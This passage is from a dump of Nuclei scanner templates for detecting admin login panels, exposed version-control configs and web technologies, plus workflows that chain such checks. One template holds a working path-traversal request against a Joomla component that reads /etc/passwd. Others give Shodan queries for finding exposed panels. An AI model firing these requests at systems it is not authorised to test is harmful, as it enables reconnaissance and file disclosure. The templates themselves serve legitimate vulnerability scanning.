BEdita Panel Login 5 | author: pikpikcu,daffainfo 6 | severity: info 7 | metadata: 8 | shodan-query: http.title:"BEdita" 9 | tags: panel,bedita 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: regex 19 | part: body 20 | regex: 21 | - 'BEdita(.*)
' 22 | 23 | - type: status 24 | status: 25 | - 200 26 | 27 | extractors: 28 | - type: regex 29 | part: body 30 | group: 1 31 | regex: 32 | - 'target="besite">(.*)
' 33 | -------------------------------------------------------------------------------- /bitrix-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: bitrix-workflow 2 | 3 | info: 4 | name: Bitrix Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Bitrix related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: exposed-panels/bitrix-panel.yaml 10 | subtemplates: 11 | - tags: bitrix 12 | -------------------------------------------------------------------------------- /bookstack-panel.yaml: -------------------------------------------------------------------------------- 1 | id: bookstack-panel 2 | 3 | info: 4 | name: BookStack Panel Login 5 | author: cyllective,daffainfo 6 | severity: info 7 | description: A platform to create documentation/wiki content built with PHP & Laravel 8 | reference: 9 | - https://github.com/BookStackApp/BookStack 10 | metadata: 11 | shodan-query: http.title:"BookStack" 12 | tags: panel,bookstack 13 | 14 | requests: 15 | - method: GET 16 | path: 17 | - "{{BaseURL}}/login" 18 | 19 | matchers-condition: and 20 | matchers: 21 | - type: word 22 | part: body 23 | condition: or 24 | words: 25 | - 'BookStack' 26 | - 'BookStack' 27 | 28 | - type: word 29 | part: header 30 | words: 31 | - 'Set-Cookie: bookstack_session' 32 | 33 | - type: status 34 | status: 35 | - 200 36 | 37 | extractors: 38 | - type: regex 39 | part: body 40 | group: 1 41 | regex: 42 | - '(?:app\.js|(?:print\-)?styles\.css)\?version=([\w\.\-]+)["'']>' 43 | -------------------------------------------------------------------------------- /bullwark-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: bullwark-workflow 2 | 3 | info: 4 | name: Bullwark Momentum Series Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Bullwark Momentum Series related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/fingerprinthub-web-fingerprints.yaml 10 | matchers: 11 | - name: bullwark 12 | subtemplates: 13 | - tags: bullwark -------------------------------------------------------------------------------- /cacti-panel.yaml: -------------------------------------------------------------------------------- 1 | id: cacti-panel 2 | 3 | info: 4 | name: Cacti Login Panel 5 | author: geeknik,daffainfo 6 | severity: info 7 | description: Cacti is a complete network graphing solution -- https://www.cacti.net/ 8 | tags: tech,cacti,login 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | - "{{BaseURL}}/cacti/" 15 | 16 | stop-at-first-match: true 17 | matchers-condition: and 18 | matchers: 19 | - type: status 20 | status: 21 | - 200 22 | 23 | - type: word 24 | part: body 25 | words: 26 | - "Login to Cacti" 27 | - "The Cacti Group" 28 | condition: and 29 | 30 | - type: regex 31 | part: header 32 | regex: 33 | - Cacti+ 34 | 35 | extractors: 36 | - type: regex 37 | part: body 38 | group: 1 39 | regex: 40 | - "

Version (.*) |" 41 | -------------------------------------------------------------------------------- /centos-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: centos-workflow 2 | 3 | info: 4 | name: Centos WebPanel Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Centos WebPanel related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: exposed-panels/cwp-webpanel.yaml 10 | subtemplates: 11 | - tags: centos 12 | -------------------------------------------------------------------------------- /centreon-panel.yaml: -------------------------------------------------------------------------------- 1 | id: centreon-panel 2 | 3 | info: 4 | name: Centreon Login Panel 5 | author: pikpikcu,daffainfo 6 | severity: info 7 | metadata: 8 | shodan-query: http.title:"Centreon" 9 | tags: panel,centreon,login 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/centreon/index.php" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | part: body 20 | condition: or 21 | words: 22 | - 'Centreon - IT & Network Monitoring' 23 | - 'Daybyday - Login" 23 | 24 | - type: status 25 | status: 26 | - 200 27 | -------------------------------------------------------------------------------- /dedecms-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: dedecms-workflow 2 | 3 | info: 4 | name: DedeCMS Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all DedeCMS related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/fingerprinthub-web-fingerprints.yaml 10 | matchers: 11 | - name: dedecms 12 | subtemplates: 13 | - tags: dedecms 14 | -------------------------------------------------------------------------------- /dolibarr-panel.yaml: -------------------------------------------------------------------------------- 1 | id: dolibarr-panel 2 | 3 | info: 4 | name: Dolibarr Panel Login 5 | author: pikpikcu,daffainfo 6 | severity: info 7 | metadata: 8 | shodan-query: http.title:"Dolibarr" 9 | tags: panel,dolibarr 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | part: header 20 | words: 21 | - 'Set-Cookie: DOLSESSID_' 22 | 23 | - type: word 24 | part: body 25 | words: 26 | - '' 27 | 28 | - type: status 29 | status: 30 | - 200 31 | 32 | extractors: 33 | - type: regex 34 | part: body 35 | group: 1 36 | regex: 37 | - 'Dolibarr ([0-9.]+)<\/td>' 38 | - 'Dolibarr ([0-9.]+)<\/td>' 39 | - '
Dolibarr ([0-9.]+)<\/div>' 40 | -------------------------------------------------------------------------------- /dolibarr-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: dolibarr-workflow 2 | 3 | info: 4 | name: Dolibarr Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Dolibarr related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: exposed-panels/dolibarr-panel.yaml 10 | subtemplates: 11 | - tags: dolibarr -------------------------------------------------------------------------------- /dotclear-panel.yaml: -------------------------------------------------------------------------------- 1 | id: dotclear-panel 2 | 3 | info: 4 | name: Dotclear Panel Login 5 | author: pikpikcu,daffainfo 6 | severity: info 7 | metadata: 8 | shodan-query: http.title:"Dotclear" 9 | tags: panel,dotclear 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/dc2/admin/auth.php" 15 | - "{{BaseURL}}/auth.php" 16 | 17 | matchers-condition: and 18 | matchers: 19 | - type: word 20 | words: 21 | - '' 22 | - 'Dotclear' 23 | condition: or 24 | 25 | - type: status 26 | status: 27 | - 200 28 | -------------------------------------------------------------------------------- /dotnetnuke-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: dotnetnuke-workflow 2 | 3 | info: 4 | name: DotNetNuke Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all DotNetNuke related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/tech-detect.yaml 10 | matchers: 11 | - name: dotnetnuke 12 | subtemplates: 13 | - tags: dotnetnuke -------------------------------------------------------------------------------- /druid-panel.yaml: -------------------------------------------------------------------------------- 1 | id: druid-panel 2 | 3 | info: 4 | name: Druid monitor Panel Login 5 | author: pikpikcu,daffainfo 6 | severity: info 7 | tags: panel,druid 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/druid/login.html" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | part: body 18 | words: 19 | - "druid monitor" 20 | 21 | - type: status 22 | status: 23 | - 200 24 | -------------------------------------------------------------------------------- /drupal-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: drupal-workflow 2 | 3 | info: 4 | name: Wordpress Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all drupal related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/tech-detect.yaml 10 | matchers: 11 | - name: drupal 12 | subtemplates: 13 | - tags: drupal -------------------------------------------------------------------------------- /duomicms-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: duomicms-workflow 2 | 3 | info: 4 | name: DuomiCMS Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all DuomiCMS related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/fingerprinthub-web-fingerprints.yaml 10 | matchers: 11 | - name: duomicms 12 | subtemplates: 13 | - tags: duomicms -------------------------------------------------------------------------------- /emby-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: emby-workflow 2 | 3 | info: 4 | name: Emby Server Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Emby Server related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/fingerprinthub-web-fingerprints.yaml 10 | matchers: 11 | - name: emby 12 | subtemplates: 13 | - tags: emby -------------------------------------------------------------------------------- /ems-webclient-panel.yaml: -------------------------------------------------------------------------------- 1 | id: ems-webclient-panel 2 | 3 | info: 4 | name: EMS Web Client Panel Login 5 | author: pussycat0x,daffainfo 6 | severity: info 7 | metadata: 8 | google-dork: inurl:EMSWebClient/ 9 | tags: panel,ems 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/emswebclient/Login.aspx" 15 | - "{{BaseURL}}/Login.aspx" 16 | 17 | stop-at-first-match: true 18 | matchers-condition: and 19 | matchers: 20 | - type: word 21 | part: body 22 | words: 23 | - "EMS Web Client - Login" 24 | 25 | - type: status 26 | status: 27 | - 200 28 | 29 | extractors: 30 | - type: regex 31 | part: body 32 | group: 1 33 | regex: 34 | - 'Web Client Version (.*)' -------------------------------------------------------------------------------- /episerver-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: episerver-workflow 2 | 3 | info: 4 | name: EpiServer Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all EpiServer related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/fingerprinthub-web-fingerprints.yaml 10 | matchers: 11 | - name: episerver 12 | subtemplates: 13 | - tags: episerver -------------------------------------------------------------------------------- /exposed-bitkeeper.yaml: -------------------------------------------------------------------------------- 1 | id: exposed-bitkeeper 2 | 3 | info: 4 | name: Exposed BitKeeper Directory 5 | author: daffainfo 6 | severity: low 7 | reference: 8 | - https://www.bitkeeper.org/man/config-etc.html 9 | tags: config,exposure 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/BitKeeper/etc/config" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | words: 20 | - "BitKeeper configuration" 21 | - "logging" 22 | - "email" 23 | - "description" 24 | condition: and 25 | 26 | - type: status 27 | status: 28 | - 200 29 | -------------------------------------------------------------------------------- /exposed-bzr.yaml: -------------------------------------------------------------------------------- 1 | id: exposed-bzr 2 | 3 | info: 4 | name: Exposed BZR Directory 5 | author: daffainfo 6 | severity: low 7 | reference: 8 | - http://doc.bazaar.canonical.com/beta/en/user-reference/configuration-help.html 9 | tags: config,exposure 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/.bzr/branch/branch.conf" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | words: 20 | - "parent_location" 21 | - "push_location" 22 | condition: or 23 | 24 | - type: status 25 | status: 26 | - 200 27 | 28 | - type: word 29 | part: header 30 | words: 31 | - "text/plain" -------------------------------------------------------------------------------- /exposed-darcs.yaml: -------------------------------------------------------------------------------- 1 | id: exposed-darcs 2 | 3 | info: 4 | name: Exposed Darcs Config 5 | author: daffainfo 6 | severity: low 7 | reference: 8 | - http://darcs.net/Using/Configuration#sources 9 | tags: config,exposure 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/_darcs/prefs/binaries" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | words: 20 | - "Binary file regexps" 21 | 22 | - type: status 23 | status: 24 | - 200 25 | -------------------------------------------------------------------------------- /exposed-hg.yaml: -------------------------------------------------------------------------------- 1 | id: exposed-hg 2 | 3 | info: 4 | name: Exposed HG Directory 5 | author: daffainfo 6 | severity: low 7 | tags: config,exposure 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/.hg/hgrc" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - "[paths]" 19 | - "default" 20 | condition: and 21 | 22 | - type: status 23 | status: 24 | - 200 25 | -------------------------------------------------------------------------------- /feifeicms-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: feifeicms-workflow 2 | 3 | info: 4 | name: FeiFeiCMS Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all FeiFeiCMS related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/fingerprinthub-web-fingerprints.yaml 10 | matchers: 11 | - name: feifeicms 12 | subtemplates: 13 | - tags: feifeicms -------------------------------------------------------------------------------- /finereport-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: finereport-workflow 2 | 3 | info: 4 | name: FineReport Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all FineReport related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/fingerprinthub-web-fingerprints.yaml 10 | matchers: 11 | - name: finereport 12 | subtemplates: 13 | - tags: finereport -------------------------------------------------------------------------------- /fortinet-panel.yaml: -------------------------------------------------------------------------------- 1 | id: fortinet-panel 2 | 3 | info: 4 | name: Fortinet Panel Login 5 | author: pikpikcu,daffainfo 6 | severity: info 7 | metadata: 8 | shodan-query: http.title:"FORTINET LOGIN" 9 | tags: panel,fortinet 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | part: body 20 | words: 21 | - 'FORTINET LOGIN' 22 | 23 | - type: status 24 | status: 25 | - 200 26 | -------------------------------------------------------------------------------- /fortinet-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: fortiner-workflow 2 | 3 | info: 4 | name: Fortinet Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all fortinet related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: exposed-panels/fortinet-panel.yaml 10 | subtemplates: 11 | - tags: fortinet -------------------------------------------------------------------------------- /gateone-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: gateone-workflow 2 | 3 | info: 4 | name: GateOne Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all GateOne related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/fingerprinthub-web-fingerprints.yaml 10 | matchers: 11 | - name: gateone 12 | subtemplates: 13 | - tags: gateone -------------------------------------------------------------------------------- /geowebserver-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: geowebserver-workflow 2 | 3 | info: 4 | name: GeoWebServer Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all GeoWebServer related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/geo-webserver.yaml 10 | subtemplates: 11 | - tags: geowebserver -------------------------------------------------------------------------------- /gespage-panel.yaml: -------------------------------------------------------------------------------- 1 | id: gespage-panel 2 | 3 | info: 4 | name: Gespage Panel Login 5 | author: pikpikcu,daffainfo 6 | severity: info 7 | metadata: 8 | shodan-query: Path=/gespage 9 | tags: panel,gespage 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/gespage/webapp/login.xhtml" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | part: body 20 | words: 21 | - '' 22 | - '' 23 | condition: and 24 | 25 | - type: status 26 | status: 27 | - 200 28 | 29 | extractors: 30 | - type: regex 31 | part: body 32 | group: 1 33 | regex: 34 | - '\(Ver: ([0-9._A-Z]+)\)' 35 | -------------------------------------------------------------------------------- /gespage-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: gespage-workflow 2 | 3 | info: 4 | name: Gespage Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Gespage related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: exposed-panels/gespage-panel.yaml 10 | subtemplates: 11 | - tags: gespage 12 | -------------------------------------------------------------------------------- /gitlist-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: gitlist-workflow 2 | 3 | info: 4 | name: GitList Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all GitList related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/tech-detect.yaml 10 | matchers: 11 | - name: gitlist 12 | subtemplates: 13 | - tags: gitlist -------------------------------------------------------------------------------- /glpi-panel.yaml: -------------------------------------------------------------------------------- 1 | id: glpi-panel 2 | 3 | info: 4 | name: GLPI Panel Login 5 | author: dogasantos,daffainfo 6 | severity: info 7 | metadata: 8 | shodan-query: http.title:"GLPI" 9 | tags: panel,glpi 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | - "{{BaseURL}}/glpi/" 16 | - "{{BaseURL}}/glpi2/" 17 | 18 | stop-at-first-match: true 19 | matchers-condition: and 20 | matchers: 21 | - type: word 22 | words: 23 | - "CFG_GLPI" 24 | - "_glpi_csrf_token" 25 | - "GLPI Copyright" 26 | condition: and 27 | 28 | - type: status 29 | status: 30 | - 200 31 | 32 | extractors: 33 | - type: regex 34 | part: body 35 | group: 1 36 | regex: 37 | - 'base.min.js?v=(.*)' -------------------------------------------------------------------------------- /glpi-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: glpi-workflow 2 | 3 | info: 4 | name: GLPI Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all GLPI Pipeline related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: exposed-panels/glpi-panel.yaml 10 | subtemplates: 11 | - tags: glpi 12 | -------------------------------------------------------------------------------- /gogs-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: gogs-workflow 2 | 3 | info: 4 | name: Gogs (Go Git Service) - Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Gogs related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: exposed-panels/gogs-login.yaml 10 | subtemplates: 11 | - tags: gogs 12 | -------------------------------------------------------------------------------- /google-books.yaml: -------------------------------------------------------------------------------- 1 | id: api-googlebooks 2 | 3 | info: 4 | name: Google Books API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://developers.google.com/books/docs/overview 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Books/Google%20Books.md 10 | tags: token-spray,google,books 11 | 12 | self-contained: true 13 | requests: 14 | - method: GET 15 | path: 16 | - "https://www.googleapis.com/books/v1/volumes/zyTCAlFPjgYC?key={{token}}" 17 | 18 | matchers: 19 | - type: word 20 | part: body 21 | words: 22 | - "kind" 23 | - "id" 24 | - "etag" 25 | condition: and 26 | -------------------------------------------------------------------------------- /graphite-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: graphite-workflow 2 | 3 | info: 4 | name: Graphite Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Graphite related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: exposed-panels/graphite-browser.yaml 10 | subtemplates: 11 | - tags: graphite 12 | -------------------------------------------------------------------------------- /grav-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: grav-workflow 2 | 3 | info: 4 | name: Grav Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Grav related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/grav-cms-detect.yaml 10 | subtemplates: 11 | - tags: grav 12 | -------------------------------------------------------------------------------- /gsoap-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: gsoap-workflow 2 | 3 | info: 4 | name: gSOAP Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all gSOAP related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/fingerprinthub-web-fingerprints.yaml 10 | subtemplates: 11 | - tags: gsoap 12 | -------------------------------------------------------------------------------- /guacamole-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: guacamole-workflow 2 | 3 | info: 4 | name: Apache Guacamole Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Apache Guacamole related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/fingerprinthub-web-fingerprints.yaml 10 | matchers: 11 | - name: guacamole 12 | subtemplates: 13 | - tags: guacamole -------------------------------------------------------------------------------- /h3c-imc-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: h3c-imc-workflow 2 | 3 | info: 4 | name: H3c IMC Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all H3c IMC related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/fingerprinthub-web-fingerprints.yaml 10 | matchers: 11 | - name: h3c-imc 12 | subtemplates: 13 | - tags: h3c-imc -------------------------------------------------------------------------------- /home-assistant-detect.yaml: -------------------------------------------------------------------------------- 1 | id: home-assistant-detect 2 | 3 | info: 4 | name: Home Assistant Detect 5 | author: fabaff,daffainfo 6 | severity: info 7 | metadata: 8 | shodan-query: http.title:"Home Assistant" 9 | tags: tech,iot 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | part: body 20 | words: 21 | - 'Home Assistant' 22 | 23 | - type: status 24 | status: 25 | - 200 26 | -------------------------------------------------------------------------------- /igs-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: igs-workflow 2 | 3 | info: 4 | name: SAP Internet Graphics Server (IGS) Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all SAP Internet Graphics Server (IGS) related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/sap/sap-igs-detect.yaml 10 | subtemplates: 11 | - tags: igs 12 | -------------------------------------------------------------------------------- /itop-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: itop-workflow 2 | 3 | info: 4 | name: iTop Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all iTop related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: exposed-panels/itop-panel.yaml 10 | subtemplates: 11 | - tags: itop 12 | -------------------------------------------------------------------------------- /jaspersoft-panel.yaml: -------------------------------------------------------------------------------- 1 | id: jaspersoft-panel 2 | 3 | info: 4 | name: Jaspersoft Panel Login 5 | author: koti2,daffainfo 6 | severity: info 7 | metadata: 8 | shodan-query: http.title:"Jaspersoft" 9 | tags: panel,jaspersoft 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/jasperserver/login.html?error=1" 15 | - "{{BaseURL}}/jasperserver-pro/login.html?error=1" 16 | 17 | stop-at-first-match: true 18 | matchers-condition: and 19 | matchers: 20 | - type: word 21 | words: 22 | - "TIBCO Jaspersoft: Login" 23 | - "Could not login to JasperReports Server" 24 | - "About TIBCO JasperReports Server" 25 | condition: or 26 | 27 | - type: status 28 | status: 29 | - 200 30 | -------------------------------------------------------------------------------- /jboss-detect.yaml: -------------------------------------------------------------------------------- 1 | id: jboss-detect 2 | 3 | info: 4 | name: JBoss detected 5 | author: daffainfo,idealphase 6 | severity: info 7 | tags: tech,jboss 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | matchers: 15 | - type: word 16 | part: body 17 | words: 18 | - "JBoss EAP 7" 19 | 20 | - type: regex 21 | part: body 22 | regex: 23 | - 'Welcome to JBoss(.*)' 24 | 25 | extractors: 26 | - type: regex 27 | group: 1 28 | part: body 29 | regex: 30 | - '

Welcome to (.+)<\/h1>' 31 | -------------------------------------------------------------------------------- /jboss-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: jboss-workflow 2 | 3 | info: 4 | name: JBoss Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all JBoss related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/jboss-detect.yaml 10 | subtemplates: 11 | - tags: jboss -------------------------------------------------------------------------------- /jeedom-panel.yaml: -------------------------------------------------------------------------------- 1 | id: jeedom-panel 2 | 3 | info: 4 | name: Jeedom Login Panel 5 | author: pikpikcu,daffainfo 6 | severity: info 7 | metadata: 8 | shodan-query: http.title:"Jeedom" 9 | tags: panel,jeedom,login 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/index.php?v=d" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | part: body 20 | words: 21 | - "Jeedom" 22 | - "JEEDOM_PRODUCT_NAME" 23 | condition: and 24 | 25 | - type: status 26 | status: 27 | - 200 28 | -------------------------------------------------------------------------------- /jeedom-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: jeedom-workflow 2 | 3 | info: 4 | name: Jeedom Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Jeedom related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: exposed-panels/jeedom-panel.yaml 10 | subtemplates: 11 | - tags: jeedom 12 | -------------------------------------------------------------------------------- /jenkins-detect.yaml: -------------------------------------------------------------------------------- 1 | id: jenkins-detect 2 | 3 | info: 4 | name: Jenkins Detection 5 | author: philippdelteil,daffainfo,c-sh0 6 | severity: info 7 | reference: 8 | - https://www.jenkins.io/doc/book/using/remote-access-api/#RemoteaccessAPI-DetectingJenkinsversion 9 | - https://github.com/jenkinsci/jenkins/pull/470 10 | - https://www.jenkins.io/doc/book/security/access-control/permissions/#access-granted-without-overallread 11 | metadata: 12 | shodan-query: http.favicon.hash:81586312 13 | tags: tech,jenkins 14 | 15 | requests: 16 | - method: GET 17 | path: 18 | - "{{BaseURL}}" 19 | - "{{BaseURL}}/whoAmI/" 20 | 21 | redirects: true 22 | max-redirects: 2 23 | stop-at-first-match: true 24 | matchers-condition: and 25 | matchers: 26 | - type: word 27 | part: header 28 | words: 29 | - "x-jenkins" 30 | case-insensitive: true 31 | 32 | - type: word 33 | words: 34 | - "Jenkins" 35 | 36 | extractors: 37 | - type: kval 38 | kval: 39 | - x_jenkins 40 | -------------------------------------------------------------------------------- /jetty-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: jetty-workflow 2 | 3 | info: 4 | name: Jetty Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Jetty related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/tech-detect.yaml 10 | matchers: 11 | - name: jetty 12 | subtemplates: 13 | - tags: jetty 14 | -------------------------------------------------------------------------------- /joomla-jvehicles-lfi.yaml: -------------------------------------------------------------------------------- 1 | id: joomla-jvehicles-lfi 2 | 3 | info: 4 | name: Joomla! Component com_sef - Local File Inclusion 5 | author: daffainfo 6 | severity: high 7 | description: A local file inclusion vulnerability in the Jvehicles (com_jvehicles) component version 1.0 for Joomla! allows remote attackers to load arbitrary files via the controller parameter in index.php. 8 | reference: 9 | - https://www.exploit-db.com/exploits/11997 10 | classification: 11 | cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N 12 | cvss-score: 8.6 13 | cwe-id: CWE-22 14 | remediation: Upgrade to a supported version. 15 | tags: cve,cve2010,joomla,lfi 16 | 17 | requests: 18 | - method: GET 19 | path: 20 | - "{{BaseURL}}/index.php?option=com_jvehicles&controller=../../../../../../../../../../etc/passwd%00" 21 | matchers-condition: and 22 | matchers: 23 | - type: regex 24 | regex: 25 | - "root:.*:0:0" 26 | - type: status 27 | status: 28 | - 200 29 | 30 | # Enhanced by cs on 2022/03/25 31 | -------------------------------------------------------------------------------- /joomla-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: joomla-workflow 2 | 3 | info: 4 | name: Joomla! Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Joomla! related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/tech-detect.yaml 10 | matchers: 11 | - name: joomla 12 | subtemplates: 13 | - tags: joomla 14 | -------------------------------------------------------------------------------- /kentico-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: kentico-workflow 2 | 3 | info: 4 | name: Kentico CMS Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Kentico CMS related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/fingerprinthub-web-fingerprints.yaml 10 | matchers: 11 | - name: kentico 12 | subtemplates: 13 | - tags: kentico -------------------------------------------------------------------------------- /keycloak-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: keycloak-workflow 2 | 3 | info: 4 | name: Keycloak Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Keycloak related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: exposed-panels/key-cloak-admin-panel.yaml 10 | subtemplates: 11 | - tags: keycloak 12 | -------------------------------------------------------------------------------- /kibana-panel.yaml: -------------------------------------------------------------------------------- 1 | id: kibana-panel 2 | 3 | info: 4 | name: Kibana Panel Login 5 | author: petruknisme,daffainfo,c-sh0 6 | severity: info 7 | metadata: 8 | shodan-query: http.title:"Kibana" 9 | tags: panel,kibana 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | - "{{BaseURL}}/login" 16 | - "{{BaseURL}}/app/kibana" 17 | 18 | stop-at-first-match: true 19 | redirects: true 20 | max-redirects: 2 21 | matchers-condition: or 22 | matchers: 23 | - type: word 24 | part: body 25 | words: 26 | - "Kibana" 27 | - "Elastic" 28 | - "Kibana Login" 29 | condition: or 30 | 31 | - type: regex 32 | part: header 33 | regex: 34 | - '(?i)(Kbn-Name)' 35 | -------------------------------------------------------------------------------- /kibana-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: kibana-workflow 2 | 3 | info: 4 | name: Kibana Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Kibana related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: exposed-panels/kibana-panel.yaml 10 | subtemplates: 11 | - tags: kibana 12 | -------------------------------------------------------------------------------- /kindeditor-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: kindeditor-workflow 2 | 3 | info: 4 | name: 